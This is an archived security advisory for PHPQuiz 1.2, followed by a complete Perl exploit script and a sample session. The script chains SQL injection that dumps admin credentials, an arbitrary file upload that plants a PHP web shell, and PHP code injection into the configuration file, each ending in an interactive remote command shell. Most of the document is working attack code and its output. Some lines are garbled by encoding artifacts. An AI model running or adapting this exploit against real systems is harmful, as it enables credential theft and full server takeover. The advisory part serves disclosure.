TUCoPS :: Web :: PHP :: b06-4781.htm

TUCoPS :: Web :: PHP :: b06-4781.htm
PHPQuiz Multiple Remote Vulnerabilites
PHPQuiz Multiple Remote Vulnerabilites PHPQuiz Multiple Remote Vulnerabilites

######################################################=0D
# =0D
# Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit=0D
# Vendor  : PHPQuiz=0D
# webiste : http://www.phpquiz.com=0D 
# Version : <= v.1.2=0D
# Severity: Critical =0D
# Author: Simo64 / simo64_at_morx_org=0D
# MorX Security Reseach Team=0D
# http://www.morx.org=0D 
# http://www.morx.org/phpquiz.txt=0D 
#=0D
#   Details : =0D
#=0D
# SQL injection=0D
#***************************=0D
#=0D
#   univers var in score.php and quiz_id var in home.php are not proprely verified and can be used to inject query=0D
#=0D
# PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]=0D 
#		 http://localhost/phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=[SQL]=0D 
#=0D
# Arbitary File Upload=0D
#********************** =0D
# vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76=0D
# =0D
#  74  if (($upload) && ($ok_update == "yes")) {=0D
#  75=0D
#  76  if(@copy($image, $path)){=0D
#  77  .....=0D
#=0D
# $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files=0D
# =0D
#  PoC Exploit : =0D
#=0D
# =0D">action="http://localhost/phpquiz/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/l3ez.php">=0D 
#  Download File
=0D
#  
=0D
#  =0D
#=0D
#  phpquiz/img_quiz/ folder is by defaut writable so after uploading a simple phpshell =0D
#=0D
# we can lanche cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls=0D 
#=0D
# PHP Code Injection=0D
#********************=0D
#=0D
# cfgphpquiz/install.php is accessible without authentification , the script is used to =0D
# save configuration setting in config.inc.php.=0D
#=0D
# Impact:=0D
# any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information =0D
# such as admin password (plain text) and login=0D
#=0D
#***********************************************************************************=0D
#=0D
# simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1=0D
# =0D
# /-----------------------------------------------------------\=0D
# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |=0D
# |            Coded by simo64 - simo64_morx.org              |=0D
# | www.morx.org |=0D 
# |-----------------------------------------------------------|=0D
# |       MorX Security Research Team =A9                       |=0D
# \-----------------------------------------------------------/=0D
# =0D
# Connecting to www.morx.org ... Connected !=0D 
# =0D
# [+] Injecting credentials=0D
# =0D
# Sending Data ...=0D
# =0D
# SQL injection Succeded !=0D
# =0D
# User EMail : admin@morx.org=0D 
#         User Login  : admin=0D
#         User Passwd : password=0D
# =0D
# [+] Exec CMD by uploading a shell       Connected !=0D
# =0D
# Uploading shell ...     [OK]=0D
# =0D
# Checking if successfully Uploaded ....  [OK]=0D
# =0D
#                 NOW YOU CAN LAUNCH COMMANDS=0D
# =0D
# simo64[at]morx.org :~$ id=0D
# uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv)=0D
# simo64[at]morx.org :~$ pwd=0D
# /home/morx/public_html/phpquiz/img_quiz=0D
# simo64[at]morx.org :~$ ls=0D
# id_1.gif=0D
# id_2.gif=0D
# id_3.gif=0D
# id_4.gif=0D
# index.php=0D
# zaz.php=0D
# simo64[at]morx.org :~$ exit=0D
# =0D
#!/usr/bin/perl=0D
=0D
use IO::Socket ;=0D
use LWP::Simple ;=0D
=0D
print q(=0D
=0D
/-----------------------------------------------------------\=0D
| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |=0D
|            Coded by simo64 - simo64_morx.org              |=0D
| www.morx.org |=0D 
|-----------------------------------------------------------|=0D
|                MorX Security Research Team =A9              |=0D
\-----------------------------------------------------------/=0D
=0D
);=0D
=0D
sub usage(){=0D
=0D
print "\nUsage   :perl $0 siteurl /path/ userid\n";=0D
print "\nExemple : perl $0 phpquiz.com /phpquiz/ 1\n";=0D
=0D
}=0D
=0D
if(!@ARGV){=0D
	&usage();=0D
	exit(0)=0D
}=0D
=0D
$host = $ARGV[0];=0D
$path = $ARGV[1];=0D
$uid  = $ARGV[2];=0D
$success = null ;=0D
$injected = 0;=0D
$injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou";=0D
$phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22;echo%20\@\$xD;\@system(\$morx);//MorX%20RulZ%20=)";=0D 
$injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";=0D
$injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";=0D
$injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,null,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*";=0D
=0D
syswrite STDOUT , "Connecting to $host ...";=0D
=0D
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
                                =0D
   die "\n\nUnable to connect to $host " unless($sock) ;=0D
=0D
syswrite STDOUT , "\tConnected !\n\n\[+] Injecting credentials\n\nSending Data ...";=0D
=0D
=0D
	print $sock "GET $path$injectmail HTTP/1.1\n";=0D
	print $sock "Host: $host\n";=0D
	print $sock "Connection: Close\n\n";=0D
=0D
	while($res = <$sock>){=0D
		if($res =~ /anim_fleche_droite.gif" border="0"> "(.*?)"<\/a>/){=0D
			$usermail = $1 ;=0D
			$success = "ok" ;=0D
			}=0D
	}=0D
	=0D
if($success eq "ok") { =0D
=0D
syswrite STDOUT , "\n\nSQL injection Succeded !\n\n";=0D
sleep 2 ;=0D
syswrite STDOUT , "\tUser EMail  : $usermail\n";=0D
 =0D
 my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
 =0D
	print $sock "GET $path$injectuser HTTP/1.1\n";=0D
	print $sock "Host: $host\n";=0D
	print $sock "Connection: Close\n\n";=0D
=0D
	while($res = <$sock>){=0D
		if($res =~ /> "(.*?)"/){=0D
			$userlogin = $1 ;=0D
			}=0D
	}=0D
	syswrite STDOUT , "\tUser Login  : $userlogin\n";=0D
	=0D
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
=0D
	print $sock "GET $path$injectpass HTTP/1.1\n";=0D
	print $sock "Host: $host\n";=0D
	print $sock "Connection: Close\n\n";=0D
=0D
	while($res = <$sock>){=0D
		if($res =~ /> "(.*?)"/){=0D
			$userpass = $1 ;=0D
			}=0D
	}=0D
=0D
syswrite STDOUT , "\tUser Passwd : $userpass\n\n";=0D
=0D
=0D
} else {print "\n\nInjecting credentials Exploit Failed !\n\n";}=0D
=0D
sleep 2;=0D
=0D
# PART2 Remote Command Execution by uploaing shell=0D
=0D
syswrite STDOUT , "\n[+] Exec CMD by uploading a shell";=0D
=0D
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
                                =0D
   die "\n\nUnable to connect to $host " unless($sock) ;=0D
=0D
syswrite STDOUT , "\tConnected !\n\n";=0D
syswrite STDOUT , "Uploading shell ...";=0D
=0D
$data='-----------------------------7d61592213049c=0D
Content-Disposition: form-data; name="dir"=0D
=0D
/=0D
-----------------------------7d61592213049c=0D
Content-Disposition: form-data; name="image"; filename="zaz.php"=0D
Content-Type: text/plain=0D
=0D
=0D
-----------------------------7d61592213049c=0D
Content-Disposition: form-data; name="submit"=0D
=0D
Upload=0D
-----------------------------7d61592213049c--=0D
';=0D
=0D
$script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/zaz.php";=0D
=0D
$len = length $data ;=0D
=0D
  print $sock "POST $script HTTP/1.0\r\n";=0D
  print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";=0D
  print $sock "Host: $host\r\n";=0D
  print $sock "Content-Length: $len\r\n";=0D
  print $sock "Connection: close\r\n\r\n";=0D
  print $sock $data;=0D
  =0D
 syswrite STDOUT , "\t[OK]\n\nChecking if successfully Uploaded .... ";=0D
 =0D
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
=0D
 print $sock "HEAD $path"."img_quiz/zaz.php  HTTP/1.0\r\n";=0D
 print $sock "Host: $host\r\n";=0D
 print $sock "Connection: close\n\n";=0D
 =0D
 while($rep = <$sock>){=0D
 if($rep =~ /HTTP\/1.1 200 OK/) { $success = 1; }=0D
 }=0D
if($success == 1){=0D
=0D
	print "\t[OK]\n\n\t\tNOW YOU CAN LAUNCH COMMANDS\n\n";=0D
	=0D
	while(){=0D
	print "simo64[at]morx.org :~\$ ";=0D
	chop($cmd=);=0D
	exit() if ($cmd eq 'exit');=0D
$result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd");=0D 
	print $result;=0D
	}=0D
=0D
}=0D
else { print "\tFailed !\n\nFile Upload Failed\n\n" }=0D
=0D
# STEP 3 Injecting PHPcode into config.inc.php file=0D
=0D
print "\n[+] Injecting PHP Code......\n\nConnecting ....";=0D
=0D
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
=0D
die "Connot Connect to $host !" unless($sock);=0D
=0D
print "\tConnected !\n\nSending Data ....\t";=0D
=0D
=0D
	print $sock "GET $phpinject HTTP/1.1\n";=0D
	print $sock "Host: $host\n";=0D
	print $sock "Content-Type: application/x-www-form-urlencoded\n";=0D
	print $sock "User-Agent: MorX-Zilla\n";=0D
	print $sock "Connection: Close\n\n";=0D
	=0D
print "\t OK\n\nChecking if code injected ...";=0D
=0D
my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);=0D
=0D
	print $sock "GET $injcheck HTTP/1.1\n";=0D
	print $sock "Host: $host\n";=0D
	print $sock "Content-Type: application/x-www-form-urlencoded\n";=0D
	print $sock "User-Agent: MorX-Zilla\n";=0D
	print $sock "Connection: Close\n\n";=0D
	=0D
while($check = <$sock>){=0D
if($check =~ /l3fou/) { $injected = 1; }=0D
}=0D
if($injected == 1 ){=0D
print "\tSucceded !\n\n\tNOW YOU ARE IN !\n\n";=0D
=0D
while(){=0D
print "simo\@morx.org :~\$ ";=0D 
	$cmd = ;=0D
	chop($cmd);=0D
	exit(0) if($cmd eq "exit");=0D
$result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd");=0D 
	print $result;=0D
	}=0D
}=0D
else {print "\tFailed\n\nPHPCode Injection Failed !\n\n";}